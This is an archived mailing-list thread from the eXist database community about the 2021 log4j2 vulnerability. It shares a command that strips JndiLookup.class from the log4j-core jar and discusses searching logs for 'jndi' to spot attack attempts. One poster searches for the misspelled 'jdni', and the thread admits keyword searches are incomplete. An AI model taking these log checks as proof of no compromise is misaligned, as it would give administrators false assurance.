Menu
▾
▴
Re: [Exist-open] log4j2 vulnerability
|
From: Michael W. <wes...@ja...> - 2021-12-16 01:32:00
|
Thank you, Ash. Logs go back to the end of November with neither jndi nor jdni (ignoring case). :-) I guess there are too many possible attack payloads to specify any single thing to look for if one was compromised. The logs do provide some reassurance. Thank you again. Take care. 2021年12月16日(木) 0:04 Clark, Ash <as....@no...>: > Hi Michael, > > Here’s a blog post that explains how the exploit works and an example log > message: > > https://www.lunasec.io/docs/blog/log4j-zero-day/#how-the-exploit-works > > I did a case insensitive search for `jdni` in my own logs (found nothing, > thankfully). I’m positive there are other tells that an expert would be > able to seek out. > > ~Ash > > ------------------------------ > *From:* Michael Westbay <wes...@ja...> > *Sent:* Wednesday, December 15, 2021 3:16 AM > *To:* Pietro Liuzzo <pie...@gm...> > *Cc:* Clark, Ash <as....@no...>; exist-open < > exi...@li...> > *Subject:* Re: [Exist-open] log4j2 vulnerability > > Extracting from the JAR file worked for me with both > the log4j-core-2.14.1.jar included with eXist 5.3.0 and with > the log4j-core-2.15.0.jar that I downloaded. > > What I want to know is what are the signs of infection? I doubt if my > systems are prime targets, but if someone was doing an automated spray to > see what caught, what should I be looking for? I remember the PUT > vulnerability a few years ago and found some attempts at PUTing PHP files > on my server. They went into the eXist database at the /db root where they > weren't effective. But their presence had me on edge. > > > 2021年12月15日(水) 16:17 Pietro Liuzzo <pie...@gm...>: > > Thanks! > > I have tried to do this as well but I am told that there is nothing to do. > perhaps the location of that class depends on the system? > > all best > Pietro > > Pietro Maria Liuzzo (egli/lui,he/him,er/ihn) > cel (DE): +49 (0) 176 61 000 606 > Skype: pietro.liuzzo (Quingentole) > ORCID: https://orcid.org/0000-0001-5714-4011 > <https://nam12.safelinks.protection.outlook.com/?url=https%3A%2F%2Forcid.org%2F0000-0001-5714-4011&data=04%7C01%7Cas.clark%40northeastern.edu%7Cadb8e49703274242b50c08d9bfa34c0e%7Ca8eec281aaa34daeac9b9a398b9215e7%7C0%7C0%7C637751530960132722%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=AYp6IgnAXOM60N%2F3sjNnvBQNsmY2HsdcQoci3Socs34%3D&reserved=0> > Academia: https://uni-hamburg.academia.edu/PietroMariaLiuzzo > <https://nam12.safelinks.protection.outlook.com/?url=https%3A%2F%2Funi-hamburg.academia.edu%2FPietroMariaLiuzzo&data=04%7C01%7Cas.clark%40northeastern.edu%7Cadb8e49703274242b50c08d9bfa34c0e%7Ca8eec281aaa34daeac9b9a398b9215e7%7C0%7C0%7C637751530960142680%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=yq9cIl6fTmCCST9XkkHAtL5Xjpkc1kFe2xdrvxyqnVE%3D&reserved=0> > > > > > > > Il giorno 14 dic 2021, alle ore 22:27, Clark, Ash < > as....@no...> ha scritto: > > zip -q -d log4j-core-*.jar > org/apache/logging/log4j/core/lookup/JndiLookup.class > > > _______________________________________________ > Exist-open mailing list > Exi...@li... > https://lists.sourceforge.net/lists/listinfo/exist-open > <https://nam12.safelinks.protection.outlook.com/?url=https%3A%2F%2Flists.sourceforge.net%2Flists%2Flistinfo%2Fexist-open&data=04%7C01%7Cas.clark%40northeastern.edu%7Cadb8e49703274242b50c08d9bfa34c0e%7Ca8eec281aaa34daeac9b9a398b9215e7%7C0%7C0%7C637751530960142680%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=AaQYRaILZh%2F98fAvQFA%2BGT4EgL3VshfjGI5Fx7098ZY%3D&reserved=0> > > > > -- > Michael Westbay > Writer/System Administrator > http://www.japanesebaseball.com/ > <https://nam12.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.japanesebaseball.com%2F&data=04%7C01%7Cas.clark%40northeastern.edu%7Cadb8e49703274242b50c08d9bfa34c0e%7Ca8eec281aaa34daeac9b9a398b9215e7%7C0%7C0%7C637751530960152635%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=IVS%2BYA5SSHOpNUfAoqI2uJOGDSwNdBp8zNxxtlHkMbs%3D&reserved=0> > -- Michael Westbay Writer/System Administrator http://www.japanesebaseball.com/ |
